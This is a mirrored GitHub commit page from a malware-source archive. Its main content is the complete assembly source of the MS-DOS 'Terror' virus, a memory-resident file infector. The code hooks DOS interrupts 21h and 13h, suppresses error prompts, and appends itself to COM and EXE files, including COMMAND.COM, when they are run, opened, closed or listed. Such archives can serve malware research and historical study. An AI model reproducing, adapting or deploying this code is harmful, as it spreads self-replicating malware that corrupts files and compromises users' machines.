daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-15 23:39:23 +00:00
Code Issues Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
vxunderground
2021-01-12 18:01:59 -06:00
committed by GitHub
parent 5dd4938a52
commit 3e7d2e8262
99 changed files with 45150 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSDOS/Virus.MSDOS.Unknown.terror.asm
+492
View File
@@ -0,0 +1,492 @@
;**********************************************
; Terror Virus
;**********************************************
Code Segment
Assume CS:Code
Org 100h
Start: jmp short Begin
Table310 dw 12E4h,09ABh
Table320 dw 138Dh,17D0h
Table330 dw 1460h,0F7Ah
FileBytes dw 12 dup (9090h)
ComSpec db 'A:\COMMAND.COM',0
CheckEXE: cmp cs:FileBytes,4D5Ah
je IsEXE
cmp cs:FileBytes,5A4Dh
IsEXE: ret
Begin: mov word ptr cs:PSPSeg,ds
push ax
mov ax,0EC59h
int 21h
cmp bp,ax
jnz Install
push cs
pop ds
StartFile: pop ax
mov es,word ptr cs:PSPSeg
call CheckEXE
je ExeFileStart
mov cx,13
mov si,offset FileBytes
push es
mov di,100h
push di
rep movsb
push es
pop ds
retf
ExeFileStart: mov si,es
add si,10h
add cs:FileBytes [16h],si
add si,cs:FileBytes [0Eh]
mov di,cs:FileBytes [10h]
push es
pop ds
cli
mov ss,si
mov sp,di
sti
jmp dword ptr cs:FileBytes [14h]
Install: mov ah,30h
int 21h
mov bx,offset Table310
cmp ax,0A03h
jne Not310
mov ax,0070h
mov bx,0D43h
mov es,ax
cmp byte ptr es:[bx],2Eh ; CS prefix
jne SetVectors
mov ax,bx
jmp short SetV1
Not310: add bx,4
cmp ax,1403h
je SetVectors
add bx,4
cmp ax,1E03h
je SetVectors
mov ax,3513h
int 21h
mov word ptr cs:True13, bx
mov word ptr cs:True13 + 2,es
mov ax,3521h
mov dx,bx
jmp short Set21
SetVectors: mov ax,word ptr cs:[bx+2]
SetV1: mov dx,word ptr cs:[bx]
mov word ptr cs:True13,ax
mov word ptr cs:True13 + 2,0070h
mov ah,34h
int 21h
Set21: push es
pop ds
mov ax,25ECh
int 21h
mov ax,word ptr cs:PSPSeg
mov es,ax
dec ax
mov ds,ax
mov bx,word ptr ds:[3]
sub bx,101
add ax,bx
mov word ptr es:[0002h],ax ; Setup PSP memory size.
; Command.COM needs that
; action; else the system
; hangs.
mov ah,4Ah
int 0ECh
mov bx,100
mov ah,48h
int 0ECh
sub ax,10h
mov es,ax
mov byte ptr ds:[0000h],5Ah ; This is the last block,
; don't you think so?
push cs
pop ds
mov si,100h
mov di,si
mov cx,MovedSize
rep movsb
mov di,offset Continue
push es
push di
retf
Continue: mov word ptr es:[0F1h],0070h
mov ax,3521h
int 0ECh
mov word ptr cs:Saved21, bx
mov word ptr cs:Saved21 + 2,es
mov ah,25h
mov dx,offset Int21
push cs
pop ds
int 0ECh
push cs
pop es
mov di,offset Handles
mov cx,25
mov al,0
rep stosb
jmp StartFile
Respond: mov bp,ax
iret
Int21: cmp ax,0EC59h
je Respond
cmp ax,4B00h
je Exec
cmp ah,3Dh
je Open
cmp ah,3Eh
je Close
cmp ah,11h
jne End21
push di
mov di,dx
cmp byte ptr ds:[di+6],08 ; Volume ID attributes
je Find1st
EndF1st: pop di
End21: db 0EAh
Saved21 dd ?
Exec: call InfectName
jmp End21
OpenEnd: pop cx
jmp End21
Open: push cx
call GetAttr
jc OpenEnd
cmp cx,20h
pop cx
jne End21
mov al,2
pushf
call dword ptr cs:Saved21
jc Err21
push ax
push bx
mov bx,ax
mov al,byte ptr cs:Command?
mov byte ptr cs:Handles [bx],al
pop bx
pop ax
Err21: retf 2
Close: cmp byte ptr cs:Handles [bx],0
jz End21
push ax
mov al,byte ptr cs:Handles [bx]
mov byte ptr cs:Command?,al
mov byte ptr cs:Handles [bx],0
mov ah,45h
int 0ECh
mov word ptr cs:TempHandle,ax
pop ax
jc End21
pushf
call dword ptr cs:Saved21
jc Err21
push bx
mov bx,word ptr cs:TempHandle
push ds
call SetV
call InfectHandle
call Restore
pop ds
pop bx
clc
retf 2
Find1st: push ax
push dx
push ds
mov al,byte ptr ds:[di+7]
mov dx,offset Comspec
or al,al
jz CurrentDrive
add al,'A'-1
mov byte ptr cs:Comspec,al
jmp short Infect1st
CurrentDrive: add dx,2
Infect1st: push cs
pop ds
call InfectName
pop ds
pop dx
pop ax
jmp EndF1st
InfectName: push ax
push bx
push cx
call GetAttr
jc EndIN0
push cx
push ds
call SetV
pop ds
mov ax,4301h
xor cx,cx
int 0ECh
jc EndIN1
mov ax,3D02h
int 0ECh
mov bx,ax
EndIN1: pop cx
jc EndInfName
call InfectHandle
mov ax,4301h
int 0ECh
EndInfName: call Restore
EndIN0: pop cx
pop bx
pop ax
ret
SetV: push ax
push dx
push bx
push es
mov ax,3513h
int 0ECh
mov word ptr cs:Old13,bx
mov word ptr cs:Old13+2,es
mov al,24h
int 0ECh
mov word ptr cs:Old24,bx
mov word ptr cs:Old24+2,es
pop es
pop bx
push cs
pop ds
mov dx,offset Critical
mov ah,25h
int 0ECh
mov dx,offset Int13
mov al,13h
int 0ECh
pop dx
pop ax
ret
InfectHandle: push ax
push cx
push dx
push si
push di
push ds
mov di,offset FileBytes
mov cx,0FFFFh
mov dx,-6
mov ax,4202h
int 0ECh
mov ah,3Fh
mov cx,6
push cs
pop ds
mov dx,di
int 0ECh
jc EndH1
cmp word ptr cs:[di],'eT'
je EndH1
xor cx,cx
xor dx,dx
mov ax,4200h
int 0ECh
mov ah,3Fh
mov cx,24
mov dx,di
int 0ECh
jnc ReadOk
EndH1: jmp EndInfHandle
ReadOk: xor cx,cx
xor dx,dx
cmp byte ptr cs:Command?,2
jne Seek
cmp word ptr ds:[di+1],4000h ; Is there some
; another virus
; in the stack?
ja EndH1
dec cx
mov dx,-(VirusSize+64)
Seek: mov ax,4202h
Seek1: int 0ECh
test ax,000Fh
jz SeekOk
mov cx,dx
mov dx,ax
add dx,10h
and dl,0F0h
mov ax,4200h
jmp Seek1
SeekOk: call CheckEXE
je SkipEXE
or dx,dx
jnz EndH1
cmp ax,1024
jnb MayBeGood?
jmp EndInfHandle
MayBeGood?: cmp ax,64000
ja EndInfHandle
SkipEXE: mov cl,4
shr ax,cl
mov si,ax
mov cl,12
shl dx,cl
add si,dx
mov ah,40h
mov dx,100h
mov cx,VirusSize
int 0ECh
jc EndInfHandle
call CheckEXE
jne ComFile
sub si,10h
sub si,word ptr cs:[di+08h]
mov word ptr cs:[di+14h],100h
mov word ptr cs:[di+16h],si
mov word ptr cs:[di+10h],400h
add si,VirusSize / 16 + 1
mov word ptr cs:[di+0Eh],si
mov ax,4202h
xor cx,cx
xor dx,dx
int 0ECh
mov cx,200h
div cx
or dx,dx
jz DontAdjust
inc ax
DontAdjust: mov word ptr cs:[di+02h],dx
mov word ptr cs:[di+04h],ax
jmp short Common
ComFile: push si
push di
push es
push cs
pop es
mov si,offset ComHeader
mov cx,11
rep movsb
pop es
pop di
pop ds:[di+11]
Common: mov ax,4200h
xor cx,cx
xor dx,dx
int 0ECh
mov ah,40h
mov cx,24
mov dx,di
int 0ECh
EndInfHandle: mov ax,5700h
int 0ECh
mov al,1
int 0ECh
mov ah,3Eh
int 0ECh
pop ds
pop di
pop si
pop dx
pop cx
pop ax
ret
Restore: push ax
push dx
push ds
mov ax,2513h
mov dx,word ptr cs:Old13
mov ds,word ptr cs:Old13+2
int 0ECh
mov al,24h
mov dx,word ptr cs:Old24
mov ds,word ptr cs:Old24+2
pop ds
pop dx
pop ax
ret
GetAttr: push ax
push es
push di
push bx
mov di,dx
push ds
pop es
mov al,0
mov cx,64
repne scasb
mov ax,word ptr ds:[di-3]
mov cx,word ptr ds:[di-5]
and ax,5F5Fh ; Upcase extension
and ch,5Fh
cmp ax,'MO'
jne Exe?
cmp cx,'C.'
je CommandChk
ErrAttr: stc
jmp short EndAttr
Exe?: cmp ax,'EX'
jne ErrAttr
cmp cx,'E.'
jne ErrAttr
CommandChk: mov cx,7
mov bx,-1
Loop0: inc bx
mov al,byte ptr ds:[bx+di-12]
and al,5Fh
cmp al,byte ptr cs:Comspec [bx+3]
loope Loop0
mov al,1
jne NoCommand
mov al,2
NoCommand: mov byte ptr cs:Command?,al
mov ax,4300h
int 0ECh
EndAttr: pop bx
pop di
pop es
pop ax
ret
Critical: mov al,3
iret
Int13: cmp ah,3
jz Skip13
db 0EAh ; JMP Far
Old13 dd ?
Skip13: db 0EAh
True13 dd ?
ComHeader db 50h,8Ch,0C8h,01h,06h,0Bh,01h,58h,0EAh,00h,01h
Terror db ' Terror'
VirusEnd label byte
VirusSize = offset VirusEnd - offset Start
Old24 dd ?
TempHandle label word
PSPSeg dw ?
MovedSize = $ - offset Start
Handles db 25 dup (?)
Command? db ?
Code EndS
End Start